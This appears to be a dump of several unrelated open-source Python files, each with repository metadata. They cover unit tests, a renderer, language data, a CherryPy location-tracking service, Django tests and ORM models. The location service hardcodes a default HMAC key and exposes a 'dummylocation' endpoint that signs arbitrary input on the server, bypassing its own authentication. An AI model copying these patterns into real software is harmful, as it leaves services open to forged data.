from webkitpy.common.net.rietveld import latest_try_jobs
from webkitpy.common.net.buildbot import Build
from webkitpy.common.net.web_mock import MockWeb
from webkitpy.common.system.outputcapture import OutputCapture
_log = logging.getLogger(__name__)
class RietveldTest(unittest.TestCase):
def setUp(self):
self.web = MockWeb(urls={
'https://codereview.chromium.org/api/11112222': json.dumps({
'patchsets': [1, 2, 3],
}),
'https://codereview.chromium.org/api/11112222/2': json.dumps({
'try_job_results': [
{
'builder': 'foo-builder',
'buildnumber': 10,
'result': -1
},
{
'builder': 'bar-builder',
'buildnumber': 50,
'results': 0
},
],
}),
'https://codereview.chromium.org/api/11112222/3': json.dumps({
'try_job_results': [
{
'builder': 'foo-builder',
'buildnumber': 20,
'result': 1
},
{
'builder': 'bar-builder',
'buildnumber': 60,
'result': 0
},
],
}),
'https://codereview.chromium.org/api/11113333': 'my non-JSON contents',
})
def test_latest_try_jobs(self):
self.assertEqual(
latest_try_jobs(11112222, ('bar-builder', 'other-builder'), self.web),
[Build('bar-builder', 60)])
def test_latest_try_jobs_http_error(self):
def raise_error(_):
raise urllib2.URLError('Some request error message')
self.web.get_binary = raise_error
oc = OutputCapture()
try:
oc.capture_output()
self.assertEqual(latest_try_jobs(11112222, ('bar-builder',), self.web), [])
finally:
_, _, logs = oc.restore_output()
self.assertEqual(logs, 'Request failed to URL: https://codereview.chromium.org/api/11112222\n')
def test_latest_try_jobs_non_json_response(self):
oc = OutputCapture()
try:
oc.capture_output()
self.assertEqual(latest_try_jobs(11113333, ('bar-builder',), self.web), [])
finally:
_, _, logs = oc.restore_output()
self.assertEqual(logs, 'Invalid JSON: my non-JSON contents\n')
def test_latest_try_jobs_with_patchset(self):
self.assertEqual(
latest_try_jobs(11112222, ('bar-builder', 'other-builder'), self.web, patchset_number=2),
[Build('bar-builder', 50)])
def test_latest_try_jobs_no_relevant_builders(self):
self.assertEqual(latest_try_jobs(11112222, ('foo', 'bar'), self.web), [])
def test_get_latest_try_job_results(self):
self.assertEqual(get_latest_try_job_results(11112222, self.web), {'foo-builder': 1, 'bar-builder': 0})
def test_filter_latest_jobs_empty(self):
self.assertEqual(filter_latest_jobs([]), [])
def test_filter_latest_jobs_higher_build_first(self):
self.assertEqual(
filter_latest_jobs([Build('foo', 5), Build('foo', 3), Build('bar', 5)]),
[Build('foo', 5), Build('bar', 5)])
def test_filter_latest_jobs_higher_build_last(self):
self.assertEqual(
filter_latest_jobs([Build('foo', 3), Build('bar', 5), Build('foo', 5)]),
[Build('bar', 5), Build('foo', 5)])
def test_filter_latest_jobs_no_build_number(self):
self.assertEqual(
filter_latest_jobs([Build('foo', 3), Build('bar')]),
[Build('foo', 3)])
| danakj/chromium | third_party/WebKit/Tools/Scripts/webkitpy/common/net/rietveld_unittest.py | Python | bsd-3-clause | 4,193 |
# MiniLight Python : minimal global illumination renderer
#
# Harrison Ainsworth / HXA7241 and Juraj Sukop : 2007-2008, 2013.
# http://www.hxa.name/minilight
from math import log10
from vector3f import Vector3f
IMAGE_DIM_MAX = 4000
PPM_ID = 'P6'
MINILIGHT_URI = 'http://www.hxa.name/minilight'
DISPLAY_LUMINANCE_MAX = 200.0
RGB_LUMINANCE = Vector3f(0.2126, 0.7152, 0.0722)
GAMMA_ENCODE = 0.45
class Img(object):
def __init__(self, w, h):
self.width = w
self.height = h
self.pixels = [0.0] * self.width * self.height * 3
def copyPixels(self, data):
assert len(data) == len(self.pixels)
i = 0
for y in range(self.height):
offset = 3 *(self.width * (self.height - 1 - y))
for x in range(3 * self.width):
self.pixels[ offset + x ] = data[ i ]
i += 1
def add_to_pixel(self, x, y, radiance):
if x >= 0 and x < self.width and y >= 0 and y < self.height:
index = (x + ((self.height - 1 - y) * self.width)) * 3
for a in radiance:
self.pixels[index] += a
index += 1
def get_formatted(self, out, iteration):
divider = 1.0 / (iteration if iteration >= 1 else 1)
tonemap_scaling = self.calculate_tone_mapping(self.pixels, divider)
out.write('%s\n# %s\n\n%u %u\n255\n' % (PPM_ID, MINILIGHT_URI,
self.width, self.height))
for channel in self.pixels:
mapped = channel * divider * tonemap_scaling
gammaed = (mapped if mapped > 0.0 else 0.0) ** GAMMA_ENCODE
out.write(chr(min(int((gammaed * 255.0) + 0.5), 255)))
def calculate_tone_mapping(self, pixels, divider):
sum_of_logs = 0.0
for i in range(len(pixels) / 3):
y = Vector3f(pixels[i * 3: i * 3 + 3]).dot(RGB_LUMINANCE) * divider
sum_of_logs += log10(y if y > 1e-4 else 1e-4)
adapt_luminance = 10.0 ** (sum_of_logs / (len(pixels) / 3))
a = 1.219 + (DISPLAY_LUMINANCE_MAX * 0.25) ** 0.4
b = 1.219 + adapt_luminance ** 0.4
return ((a / b) ** 2.5) / DISPLAY_LUMINANCE_MAX
| imapp-pl/golem | gnr/benchmarks/minilight/src/img.py | Python | gpl-3.0 | 2,157 |
# coding: utf-8
# Ref: http://learn101.org/xhosa_plural.php
from sua import *
data = {
'order': bantu['order'],
'order_triple': bantu['order_triple'],
'plural': {
'prefix': {'in': 'izin', 'um':'aba'},
},
'conjugate': {
'prefix': {
'default': {
'inf': 'uku',
'now_tdy': {JE:'nda', TU:'u', ELLE:'uh', IL:'uh', IT:'uh', NOUS:'siya', VOUS:'wa', ELLES:'ba', ILS:'ba'},
'tdy': {JE:'ndi', TU:'u', ELLE:'u', IL:'u', IT:'u', NOUS:'si', VOUS:'we', ELLES:'be', ILS:'be'},
'tmw': {JE:'ndizo', TU:'uzo', ELLE:'uzo', IL:'uzo', IT:'uzo', NOUS:'sizo', VOUS:'wazo', ELLES:'bazo', ILS:'bazo'},
'ydy': {JE:'nda', TU:'u', ELLE:'uh', IL:'uh', IT:'uh', NOUS:'siya', VOUS:'wa', ELLES:'ba', ILS:'ba'},
},
},
'suffix': {
'default': {
'inf': 'a',
'tdy': 'a',
'tmw': 'a',
'ydy': 'a',
'now_tdy': 'ile',
},
},
},
'stem': {'prefix': 'uku', 'suffix': 'a'},
'subs': [
('[a]', ''),
('[the]', ''),
]
}
| kasahorow/kwl | data/sua_xhosa.py | Python | bsd-2-clause | 1,021 |
#!/bin/env python
"""Service to collect and maintain data from external devices."""
import os
import sys
sys.path.append("../..")
import time
import math
from math import sqrt, acos, degrees
from collections import namedtuple
from multiprocessing import Pipe
from multiprocessing import Process as MultiProcess
import hmac
import hashlib
from SimPy.SimulationRT import hold, passivate, Process
import cherrypy
from cherrypy import expose
from peach import fuzzy
from numpy import linspace
from mosp.geo import osm, utm
from external_person import ExternalPerson
#XXX DEBUG, remove this
from mosp.monitors import SocketPlayerMonitor
__author__ = "P. Tute, B. Henne"
__maintainer__ = "B. Henne"
__contact__ = "[email protected]"
__copyright__ = "(c) 2012, DCSec, Leibniz Universitaet Hannover, Germany"
__license__ = "GPLv3"
HMAC_KEY_DEFAULT = 'omfgakeywtfdoidonow?'
MIN_ACCURACY = 100 # meter
LOCATION_CACHE_SIZE = 2 # should be 2 at last!
class ConnectionService(object):
def __init__(self, address, port, conn, map_path, free_move_only, hmac_key):
self.sign = hmac.HMAC(hmac_key, digestmod=hashlib.sha256)
self.conn = conn
cherrypy.config.update({'server.socket_host': address,
'server.socket_port': port,
'tools.staticdir.on': True,
'tools.staticdir.dir': os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../mosp_tools/external_device_slippy_map_client/'),
#'log.screen': False,
})
self.MatchingData = namedtuple('MatchingData', 'matched_way x y acc')
self.Point = namedtuple('Point', 'x y time')
self.last_match = {} # {id: MatchingData}
self.received_points = {} # {id: [Point, ...]}
self.matches = {} # {id: {time: MatchingData}}
self.need_init = []
self.known_times = {} # {id: {time: [lat, lon, acc]}}
self.free_move_only = free_move_only
self.geo = osm.OSMModel(map_path)
self.geo.initialize(sim=None, enable_routing=False)
self.min_x = self.geo.bounds['min_x']
self.max_x = self.geo.bounds['max_x']
self.min_y = self.geo.bounds['min_y']
self.max_y = self.geo.bounds['max_y']
# init for fuzzy logic
# XXX value taken from paper, might need improvement
self.curve_center = 7
self.short_distance = fuzzy.DecreasingSigmoid(self.curve_center, 1)
self.long_distance = fuzzy.IncreasingSigmoid(self.curve_center, 1)
self.small_angle = fuzzy.DecreasingRamp(25, 65)
self.large_angle = fuzzy.IncreasingRamp(25, 65)
self.output_low = fuzzy.DecreasingRamp(3, 5)
self.output_avg = fuzzy.Triangle(3, 5, 7)
self.output_high = fuzzy.IncreasingRamp(5, 7)
self.c = fuzzy.Controller(linspace(0.0, 10.0, 100))
# rule 1: IF distance IS short AND angle IS small THEN propability IS high
self.c.add_rule(((self.short_distance, self.small_angle), self.output_high))
# rule 2: IF distance IS long AND angle IS large THEN propability IS low
self.c.add_rule(((self.long_distance, self.large_angle), self.output_low))
# rule 3: IF distance IS short AND angle IS large THEN propability IS average
self.c.add_rule(((self.short_distance, self.large_angle), self.output_avg))
# rule 4: IF distance IS long AND angle IS small THEN propability IS average
self.c.add_rule(((self.long_distance, self.small_angle), self.output_avg))
@expose
def dummylocation(self, id='', lat='', lon='', acc='', speed='', bearing=''):
msg_sign = self.sign.copy()
msg_sign.update(id + lat + lon)
msg_hash = msg_sign.hexdigest()
self.location(id=id, lat=lat, lon=lon, acc=acc, hmac=msg_hash)
@expose
def location(self, id='', lat='', lon='', acc='', hmac=''):
"""Handle incoming location from $HOSTNAME:$PORT/location?$PARAMS."""
time_received = time.time()
msg_sign = self.sign.copy()
msg_sign.update(id + lat + lon)
msg_hash = msg_sign.hexdigest()
# check HMAC
if msg_hash != hmac:
print 'HMAC hashes do not match!'
print 'hash of message', msg_hash
print 'hash received: ', hmac
return '<h1>Error!</h1>'
try:
# extract values from received strings
id_value = int(id)
lat_value = float(lat)
lon_value = float(lon)
x, y = utm.latlong_to_utm(lon_value, lat_value)
acc_value = float(acc)
if acc_value > MIN_ACCURACY:
print 'Received data with insufficient accuracy of {:f}. Minimal accuracy is {:d}'.format(acc_value, MIN_ACCURACY)
return '<h1>Not accurate enough!</h1>'
if (x - acc_value < self.min_x or
x + acc_value > self.max_x or
y - acc_value < self.min_y or
y + acc_value > self.max_y):
print 'Received data with out of bounds coordinates!'
print id + ' ' +lat + ' ' +lon + ' ' + acc
self.conn.send([id_value, None, None, x, y, time_received])
#self.conn.send([id_value, None, None, x, y, time_received, lat_value, lon_value])
return '<h1>Out of bounds!</h1>'
except ValueError:
# some value was not well formatted...ignore message
print 'Received invalid data!'
return '<h1>Values not well formatted!</h1>'
# send data to simulation
if self.free_move_only:
self.conn.send([id_value, None, None, x, y, time_received])
else:
match = self.fuzzy_map_match(id_value, x, y, acc_value, time_received)
if match is not None:
self.conn.send(match)
else:
self.conn.send([id_value, None, None, x, y, time_received])
#self.conn.send([id_value, None, None, x, y, time_received, lat_value, lon_value])
# save received coordinates
        if id_value not in self.received_points:
self.received_points[id_value] = [self.Point(x, y, time_received)]
else:
self.received_points[id_value].append(self.Point(x, y, time_received))
            while len(self.received_points[id_value]) > LOCATION_CACHE_SIZE:
                # drop the oldest cached point; sort the stored list in place so
                # the deletion affects it (Point fields are x, y, time)
                self.received_points[id_value].sort(key=lambda p: p.time)
                del self.received_points[id_value][0]
print 'Received valid data: ID ' + id + ', lat ' +lat + ', lon ' +lon + ', acc ' + acc + ', at ' + str(time_received)
return '<h1>Correct!</h1>'
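    # Client-side sketch (added for illustration; host, port and values are
    # placeholders): a sender signs the concatenation id+lat+lon with the shared
    # key exactly as dummylocation() does above, then issues
    #   GET http://<host>:<port>/location?id=42&lat=52.37&lon=9.73&acc=10.0&hmac=<hexdigest>
    # where <hexdigest> comes from hmac.HMAC(key, digestmod=hashlib.sha256)
    # updated with '42' + '52.37' + '9.73'.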
def add_match(self, time, id, x, y, acc, way_segment):
"""Add a new set of values to the known locations and remove an old one if necessary.
@param time: Timestamp of receive-time
@param id: id of the person
@param x: x coordinate of received location
@param y: y coordinate of received location
@param acc: accuracy of received location
@param way_segment: the current way segment the person was matched to
"""
values = self.MatchingData(way_segment, x, y, acc)
if id not in self.matches:
self.matches[id] = {}
self.matches[id][time] = values
self.last_match[id] = values
if len(self.matches[id]) > LOCATION_CACHE_SIZE:
del self.matches[id][sorted(self.matches[id].keys())[0]]
def fuzzy_map_match(self, id, x, y, acc, time):
"""Match the received coordinates to the OSM-map using fuzzy logic.
Algorithm is based on http://d-scholarship.pitt.edu/11787/4/Ren,_Ming_Dissertation.pdf (Chapter 4.3)
@param id: id of the person
@param x: x coordinate of received location
@param y: y coordinate of received location
@param acc: accuracy of received location
@param time: timestamp of receival
@return: a list with format [person_id, node_id_start, node_id_end, matched_x, matched_y, time_received] or None if no match was found
"""
if not id in self.matches or id in self.need_init:
print '\tinitial map',
if id in self.need_init:
print 'because of renewal',
self.need_init.remove(id)
print
if id not in self.received_points:
# at least two points are needed (current one and previous one) to be able to match
print 'not enough points yet'
return None
last_fix = sorted(self.received_points[id], key=lambda p: p.time, reverse=True)[0]
segment, matched_x, matched_y = self.initial_fuzzy_match(x, y, last_fix.x, last_fix.y, acc)
else:
print '\tsubsequent match'
match = self.subsequent_fuzzy_match(x, y, acc, self.last_match[id].matched_way, id)
if match is not None:
segment, matched_x, matched_y = match
else:
                print 'Person left matched segment, redo initial match.'
                last_fix = sorted(self.received_points[id], key=lambda p: p.time, reverse=True)[0]
                segment, matched_x, matched_y = self.initial_fuzzy_match(x, y, last_fix.x, last_fix.y, acc)
if segment is None:
print '\tno result segment'
# No segment found
return None
print '\tresult ', segment, matched_x, matched_y
self.add_match(time, id, matched_x, matched_y, acc, segment)
return [id, self.geo.map_nodeid_osmnodeid[segment.nodes[0].id], self.geo.map_nodeid_osmnodeid[segment.nodes[1].id], matched_x, matched_y, time]
#lon, lat = utm.utm_to_latlong(x, y, 32)
#return [id, self.geo.map_nodeid_osmnodeid[segment.nodes[0].id], self.geo.map_nodeid_osmnodeid[segment.nodes[1].id], matched_x, matched_y, time, lat, lon]
def initial_fuzzy_match(self, x, y, previous_x, previous_y, acc, candidates=None):
"""Perform initial map match based on fuzzy logic using the peach package.
@param x: x coordinate of received location
@param y: y coordinate of received location
@param previous_x: x coordinate of last received location
@param previous_y: y coordinate of last received location
@param acc: accuracy of received location
@param candidates: an iterable containing a set of predefined candidate segments (default is None)
@return: a tuple containing (identified segment, matched x, matched y)
"""
if candidates is None:
candidates = [obj for obj in self.geo.collide_circle(x, y, acc) if isinstance(obj, osm.WaySegment)]
# now calculate match possibilities for all nearby segments
results = {}
for candidate in candidates:
closest_x, closest_y = candidate.closest_to_point(x, y)
distance = sqrt((x - closest_x)**2 + (y - closest_y)**2)
angle = self.calculate_angle((candidate.x_start, candidate.y_start), (candidate.x_end, candidate.y_end),
(previous_x, previous_y), (x, y))
angle = angle if angle < 90 else abs(angle - 180) # ignore direction of road
# the order distance, angle must be consistant with the order in the rule definition!
results[candidate] = self.c(distance, angle)
# finally select the segment with highest match propability
if results:
match = max(results.items(), key=lambda item: item[1])[0]
match_x, match_y = match.closest_to_point(x, y)
# or None, if no match was found
else:
match = None
match_x, match_y = x, y
return (match, match_x, match_y)
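    # Illustrative note (added): with the fuzzy rules configured in __init__ above, a
    # candidate segment about 3 m away whose heading differs by roughly 10 degrees
    # fires rule 1 (short distance AND small angle) strongly and defuzzifies near the
    # top of the 0..10 output universe, while a segment 30 m away at 80 degrees
    # scores near the bottom, so the max() selection above prefers the former.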
def subsequent_fuzzy_match(self, x, y, acc, segment, id):
"""Perform subsequent matching along the identified segment and check for transition into new segment.
@param x: x coordinate of received location
@param y: y coordinate of received location
@param acc: accuracy of received location
@param segment: the way segment the person is currently moving on
@return: a tuple containing (identified segment, matched x, matched y)
"""
# Check if person is still colliding, detect movement away from road
if segment not in [obj for obj in self.geo.collide_circle(x, y, acc) if isinstance(obj, osm.WaySegment)]:
print 'Subsequent match detected movement away from matched street segment, performing initial match again!'
self.need_init.append(id)
return None, None, None
start_point = segment.nodes[0]
end_point = segment.nodes[1]
distance_threshold = acc #XXX arbitrary value! find real one! (maybe half of maximum move without update on android)
distance_to_start = sqrt((x - start_point.x)**2 + (y - start_point.y)**2)
distance_to_end = sqrt((x - end_point.x)**2 + (y - end_point.y)**2)
angle_to_start = self.calculate_angle((start_point.x, start_point.y), (end_point.x, end_point.y),
(start_point.x, start_point.y), (x, y))
angle_to_end = self.calculate_angle((start_point.x, start_point.y), (end_point.x, end_point.y),
(x, y), (end_point.x, end_point.y))
matched_x, matched_y = segment.closest_to_point(x, y)
if angle_to_start > 90 or angle_to_end > 90 or min(distance_to_start, distance_to_end) < distance_threshold:
# person left segment, reinitiate matching with next coordinates
#TODO maybe use segments of exit-node as new candidates
# contra: matching errors are carried
self.need_init.append(id)
return (segment, matched_x, matched_y)
def calculate_angle(self, start1, end1, start2, end2):
"""Calculate the angle between two lines identified by start and end points.
@param start1: starting point of line one
@type start1: tuple (x, y)
@param end1: ending point of line one
@type end1: tuple (x, y)
@param start2: starting point of line two
@type start2: tuple (x, y)
@param end2: ending point of line two
@type end2: tuple (x, y)
@return: angle in degrees as integer
"""
vector1 = [end1[0] - start1[0], end1[1] - start1[1]]
length1 = sqrt(sum((a*b) for a, b in zip(vector1, vector1)))
vector2 = [end2[0] - start2[0], end2[1] - start2[1]]
length2 = sqrt(sum((a*b) for a, b in zip(vector2, vector2)))
dotproduct = float(sum((a*b) for a, b in zip(vector1, vector2)))
angle = degrees(acos(dotproduct / (length1 * length2)))
angle = angle - 180 if angle > 180 else angle
return angle
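# Worked example (added for illustration, not part of the original module):
# calculate_angle() treats each line as the vector from its start to its end and
# returns the unsigned angle between the two vectors via the dot product. For
# instance, line (0,0)->(1,0) against line (0,0)->(1,1) gives about 45 degrees,
# and against (0,0)->(0,1) gives 90 degrees; the map matcher above folds angles
# greater than 90 back with abs(angle - 180) so that road direction is ignored.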
class ExternalDataManager(Process):
def __init__(self, sim, address, port, map_path, free_move_only, hmac_key=HMAC_KEY_DEFAULT):
Process.__init__(self, name='ExternalDataManager', sim=sim)
self.sim = sim
self.conn, child_conn = Pipe()
self.service = ConnectionService(address, port, child_conn, map_path, free_move_only, hmac_key)
self.service_process = MultiProcess(target=cherrypy.quickstart, args=(self.service, ))
#self.service_process.daemon = True
self.service_process.start()
self.running = True
self.free_move_only = free_move_only
def run(self):
for pers in self.sim.persons:
if isinstance(pers, ExternalPerson):
pers.current_coords = pers.current_coords_free_move
pers.calculate_duration = pers.calculate_duration_free_move
if self.free_move_only:
self.sim.geo.free_obj.add(pers)
while self.running:
sim = self.sim
geo = self.sim.geo
while(self.conn.poll()):
person_id, node_id_start, node_id_end, x, y, time_received = self.conn.recv()
#person_id, node_id_start, node_id_end, x, y, time_received, lat, lon = self.conn.recv()
person = sim.get_person(person_id)
if person == None:
print 'ExternalDataManager received unknown person id ', person_id, '. Discarded'
continue
if not isinstance(person, ExternalPerson):
print 'Received ID ', person_id, ' does not belong to external person. Discarded'
continue
person.last_received_coords = [x, y]
if node_id_start is not None:
if person in self.sim.geo.free_obj:
print 'Removing person with ID ', person_id, ' from free objects set!'
self.sim.geo.free_obj.remove(person)
person.new_next_node = geo.way_nodes_by_id[geo.map_osmnodeid_nodeid[node_id_end]]
person.new_last_node = geo.way_nodes_by_id[geo.map_osmnodeid_nodeid[node_id_start]]
person.need_next_target = True
else:
print 'Free move or no match found; free moving!'
self.sim.geo.free_obj.add(person)
#for m in sim.monitors:
# if isinstance(m, SocketPlayerMonitor):
# m.add_heatmap_blip(lat, lon, 3, (0.0, 0.0, 1.0, 0.4))
#lon, lat = utm.utm_to_latlong(x, y, sim.geo.zone)
#for m in sim.monitors:
# if isinstance(m, SocketPlayerMonitor):
# m.add_heatmap_blip(lat, lon, 3, (1.0, 0.0, 0.0, 0.4))
self.interrupt(person)
yield hold, self, 1
def shutdown(self):
self.service_process.terminate()
if __name__ == '__main__':
#import guppy
#map = osm.OSMModel('../../data/hannover4.osm')
#map.initialize(sim=None, enable_routing=False)
#print 'Without routing\n\t',
#print guppy.hpy().heap()
#del map
#print 'Starting routing calc'
#map = osm.OSMModel('../../data/hannover4.osm')
#map.initialize(sim=None, enable_routing=True)
#print 'With routing\n\t',
#print guppy.hpy().heap()
#manager = ExternalDataManager('192.168.1.33', 8080)
service = ConnectionService('192.168.1.33', 8080, None, '../../data/hannover2.osm', True, HMAC_KEY_DEFAULT)
cherrypy.quickstart(service)
| bhenne/MoSP | mosp/external_persons/external_data_manager.py | Python | gpl-3.0 | 18,566 |
from django.test import TestCase, Client
from organizations.models import Organization
# Create your tests here.
class ViewTests(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_create_org(self):
c = Client()
response = c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
response = c.post('/organizations/create/', {'name': 'Organization_1', 'description': 'Description for org 1', 'openness': 'O'})
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
def test_view_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# Create organization...
c.post('/organizations/create/', {'name': 'Organization_1', 'description': 'Description for org 1', 'openness': 'O'})
# View details about this org, should redirect to dashboard
org = Organization.objects.all()[0]
response = c.get('/organizations/'+str(org.id)+'/details/')
self.assertRedirects(response, '/dashboard/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Organization creation test passed')
def test_view_nonexistant_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
response = c.get('/organizations/'+str(7)+'/details/')
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Viewing non-existant organization test passed')
def test_delete_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# Create organization...
c.post('/organizations/create/', {'name': 'Organization_1', 'description': 'Description for org 1', 'openness': 'O'})
# Delete this org, should redirect to organizations list
org = Organization.objects.all()[0]
response = c.get('/organizations/'+str(org.id)+'/delete/')
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Delete organization test passed')
def test_delete_nonexistant_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# Delete nonexistant, should redirect to organizations list
response = c.get('/organizations/'+str(7)+'/delete/')
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Deleting nonexistant organization test passed')
def test_edit_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# Create organization...
c.post('/organizations/create/', {'name': 'Organization_1', 'description': 'Description for org 1', 'openness': 'O'})
org = Organization.objects.all()[0]
response = c.get('/organizations/'+str(org.id)+'/edit/')
self.assertEqual(response.status_code, 200)
print('Edit organization test passed')
def test_nonexistant_edit_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# No organizations exist, try to visit organization 7
response = c.get('/organizations/7/edit/')
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Edit non-existant organization test passed')
| amacnair/team-toolkit | clubbr/organizations/tests.py | Python | mit | 3,992 |
import sys
import os.path
from sqlalchemy import Column, Integer, String
# setup path so we can import our own models and controllers
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from import_tool.models.base import Base
class CodeSystem(Base):
"""
CodeSystems class that keeps track of information about a
particular ods file update. This class uses SQLAlchemy as an ORM
"""
__tablename__ = 'codesystems'
ref = Column(Integer, primary_key=True)
id = Column(String(10), index=True)
name = Column(String(50))
displayname = Column(String(200))
# Returns a printable version of the objects contents
def __repr__(self):
return "<CodeSystem('%s %s %s %s'\
)>" % (
self.ref,
self.name,
self.id,
self.displayname)
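# Illustrative sketch (added; not part of the original module): one way a
# CodeSystem row could be created and read back using a throwaway in-memory
# SQLite engine. The engine URL, session handling and sample values below are
# assumptions for demonstration only.
def _example_usage():
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker
    engine = create_engine('sqlite:///:memory:')
    Base.metadata.create_all(engine)  # creates the 'codesystems' table
    session = sessionmaker(bind=engine)()
    session.add(CodeSystem(id='role', name='roles', displayname='Organisation Role'))
    session.commit()
    return session.query(CodeSystem).filter_by(name='roles').first()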
| open-ods/import_tool | import_tool/models/CodeSystem.py | Python | gpl-3.0 | 844 |
#%%
import pytest
import numpy as np
from numpy.testing import assert_allclose
from natural_bm import components
import natural_bm.backend as B
#%%
def test_NeuralNetParts():
# initialize an abstract neural net part
name = 'test'
nnet = components.NeuralNetParts(name)
# add some weights to it
train_weights = [0, 1, 2]
non_train_weights = [3, 4, 5, 6]
weights = train_weights + non_train_weights
# test two ways to add weights: item and lists
nnet.trainable_weights = train_weights[0]
nnet.trainable_weights = train_weights[1:]
nnet.non_trainable_weights = non_train_weights[0]
nnet.non_trainable_weights = non_train_weights[1:]
# verify
assert name == nnet.name
assert train_weights == nnet.trainable_weights
assert non_train_weights == nnet.non_trainable_weights
assert weights == nnet.weights
#%%
def test_Synapse():
# initialize
name = 'test'
shape = (10, 100)
init_W = np.zeros(shape)
synapse = components.Synapse(name, init_W)
# verify
assert shape == synapse.shape
assert_allclose(init_W, synapse.W.eval())
assert_allclose(init_W, synapse.trainable_weights[0].eval())
#%%
def test_Layer_init():
# initialize
name = 'test'
shape = (10, )
init_b = np.zeros(shape)
W = B.variable(np.zeros((10, 10)))
up_dict = {0: W}
down_dict = {1: W}
layer = components.Layer(name, init_b, up_dict, down_dict)
# verify
assert shape[0] == layer.dim
assert_allclose(init_b, layer.b.eval())
assert_allclose(init_b, layer.trainable_weights[0].eval())
#%%
def _make_layer(up_dict, down_dict):
# initialize
name = 'test'
shape = (10, )
init_b = np.zeros(shape)
layer = components.Layer(name, init_b, up_dict, down_dict)
return layer
#%%
@pytest.mark.parametrize('direction', ['up', 'down', 'both'],
ids=['up', 'down', 'both'])
def test_Layer_direction(direction):
W = B.variable(np.zeros((10, 10)))
up_dict, down_dict = {}, {}
if direction in ['up', 'both']:
up_dict = {0: W, 1: W, 2: W}
if direction in ['down', 'both']:
down_dict = {0: W, 1: W}
layer = _make_layer(up_dict, down_dict)
assert direction == layer.direction
if direction == 'both':
assert (len(up_dict)+len(down_dict))/len(up_dict) == layer._z_up_adj
assert (len(up_dict)+len(down_dict))/len(down_dict) == layer._z_down_adj
else:
assert not hasattr(layer, '_z_up_adj')
assert not hasattr(layer, '_z_down_adj')
#%%
def test_Layer_direction_fail():
with pytest.raises(Exception) as e_info:
layer = _make_layer({}, {})
#%%
def test_Layer_input_z():
mbs = 25
pixel = 15
layer_size_list = [10, pixel, 20]
# initialize
name = 's0'
s0_shape = (layer_size_list[0], pixel)
init_W = np.zeros(s0_shape)
synapse = components.Synapse(name, init_W)
up_dict = {0: synapse.W}
name = 's2'
s2_shape = (pixel, layer_size_list[2])
init_W = np.zeros(s2_shape)
synapse = components.Synapse(name, init_W)
down_dict = {2: synapse.W}
name = 'layer1'
shape = (pixel, )
init_b = np.zeros(shape)
layer = components.Layer(name, init_b, up_dict, down_dict)
input_ls = [np.zeros((mbs, size)) for size in layer_size_list]
# tests
for direction in ['both', 'up', 'down']:
z = layer.input_z(input_ls, direction=direction)
assert_allclose(np.zeros((mbs, pixel)), z.eval())
#%% Main
if __name__ == '__main__':
pytest.main([__file__])
| alexhunterlang/natural_bm | tests/natural_bm/test_components.py | Python | mit | 3,599 |
#!/bin/env python
import sys
import os
services = os.environ['CONDRI_HAPROXY_SERVICES'].split(',')
for x in [x.split('::')[-1] for x in services]:
print x
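# Example (added for clarity): with CONDRI_HAPROXY_SERVICES="web::app1,db::pg::primary"
# the loop above prints "app1" and "primary" -- the text after the last "::" in
# each comma-separated entry.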
| thefab/docker-consul-driven-haproxy | root/usr/local/bin/get_service_names.py | Python | mit | 161 |
#!/usr/bin/env python
import unittest
import os
import sys
import signal
import subprocess
import platform
import datetime
import logging
import time
import tempfile
import json
import traceback
abs_file = os.path.abspath(__file__)
abs_dir = os.path.dirname(abs_file)
sys.path.append(abs_dir + '/..')
sys.path.append(abs_dir + '/../../')
from easy_py_messaging import apiLoggerInit
from easy_py_messaging.utils import bcolors
from easy_py_messaging.utils import cycle_priority
from easy_py_messaging import logFilter
from easy_py_messaging import logConfig
from easy_py_messaging import utils
from easy_py_messaging import logCollector
from easy_py_messaging import loggingClientTask
from easy_py_messaging import listeningPort
# Name/Directory service - both client and server
from easy_py_messaging import dirSvc
from easy_py_messaging import dirClient
# Single test example:
# python -m unittest testLogging.RunTests.testNaming
def fcnName(func):
"""Decorator to print function name before running test."""
def wrapper(*func_args, **func_kwargs):
print('=== test fcn: ' + func.__name__)
return func(*func_args, **func_kwargs)
return wrapper
class RunTests(unittest.TestCase):
@fcnName
def testConfigSettings(self):
"""
Spawn the server and client loggers
in their own separate procsses.
"""
abs_path_server = os.path.abspath(logCollector.__file__)
abs_path_app = os.path.abspath(loggingClientTask.__file__)
log_filename = os.path.abspath('./logs.log')
print '***** log_filename:%s' % log_filename
# Remove existing log file
# Other tests will test for append mode.
if os.path.exists(log_filename) and os.path.isfile(log_filename):
os.remove(log_filename)
print 'starting collector'
argv_collector = ['python',
abs_path_server,
'--log-file', log_filename,
'-t']
proc_collector = subprocess.Popen(argv_collector)
print ' '.join(argv_collector)
print (bcolors.BGGREEN +
('proc_collector pid: %d' % proc_collector.pid) +
bcolors.ENDC)
argv_client = ['python',
abs_path_app, '123']
print 'starting loggingClientTask:' + ' '.join(argv_client)
proc_app = subprocess.Popen(argv_client,
stderr=subprocess.STDOUT)
print (bcolors.BGGREEN +
('proc_app pid: %d' % proc_app.pid) +
